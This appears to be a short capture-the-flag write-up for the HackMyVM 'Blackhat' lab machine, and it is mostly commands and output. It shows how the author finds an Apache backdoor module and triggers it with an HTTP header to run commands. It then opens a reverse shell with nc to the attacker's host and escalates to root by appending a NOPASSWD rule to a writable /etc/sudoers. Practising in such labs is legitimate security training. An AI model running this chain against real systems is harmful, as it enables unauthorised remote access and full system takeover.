NOTES ABOUT Blackhat
[ 2022-12-02 ] [ HackMyVM / Blackhat ]Status: Rooted
Skills: Port Scanning, phpinfo(), RevShell, ACLs
Tools: nmap, nc, getfacl
PORT SCANNING
$ nmap -sCSV -p- 10.0.2.45
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.54 ((Debian))
|_http-title: Hacked By HackMyVM
|_http-server-header: Apache/2.4.54 (Debian)
GETTING IN
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.45/FUZZ
index.html [Status: 200, Size: 1437, Words: 328, Lines: 63, Duration: 2ms]
.htpasswd [Status: 403, Size: 273, Words: 20, Lines: 10, Duration: 682ms]
.htaccess [Status: 403, Size: 273, Words: 20, Lines: 10, Duration: 810ms]
.hta [Status: 403, Size: 273, Words: 20, Lines: 10, Duration: 822ms]
phpinfo.php [Status: 200, Size: 69380, Words: 3300, Lines: 769, Duration: 136ms]
server-status [Status: 403, Size: 273, Words: 20, Lines: 10, Duration: 1ms]
$ curl -s http://10.0.2.45
<!DOCTYPE html>
<html lang="en">
[...]
<div style="display:none;">check backboor</div>
[...]
</html>
$ curl -s http://10.0.2.45/phpinfo.php | grep backdoor
<tr><td class="e">Loaded Modules </td><td class="v"> [...] mod_backdoor [...] </td></tr>
https://github.com/WangYihang/Apache-HTTP-Server-Module-Backdoor
$ curl -H 'Backdoor: id' http://10.0.2.45/
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ curl -H 'Backdoor: nc 10.0.2.15 443 -c sh' http://10.0.2.45/
ELEVATING PRIVILEGES
www-data@blackhat:/$ cd /home
www-data@blackhat:/home$ ls -la
drwxr-xr-x 3 darkdante darkdante 4096 Nov 13 08:45 darkdante
www-data@blackhat:/home$ su darkdante
darkdante@blackhat:/home$ id
uid=1000(darkdante) gid=1000(darkdante) groups=1000(darkdante)
darkdante@blackhat:/home$ cd
darkdante@blackhat:~$ cat user.txt
***************************
darkdante@blackhat:~$ getfacl --recursive --skip-base / 2>/dev/null | grep "file:" | cut -d" " -f3 | awk '{print "/"$1}'
[...]
/etc/sudoers
darkdante@blackhat:~$ ls -l /etc/sudoers
-r--rw----+ 1 root root 702 Dec 2 18:59 /etc/sudoers
darkdante@blackhat:~$ getfacl /etc/sudoers
getfacl: Removing leading '/' from absolute path names
# file: etc/sudoers
# owner: root
# group: root
user::r--
user:darkdante:rw-
group::r--
mask::rw-
other::---
darkdante@blackhat:~$ echo "darkdante ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
darkdante@blackhat:~$ sudo su
root@blackhat:/home/darkdante# cd
root@blackhat:~# cat root.txt
***************************
root@blackhat:~# init 0
Session terminated, killing shell... ...killed.
Terminated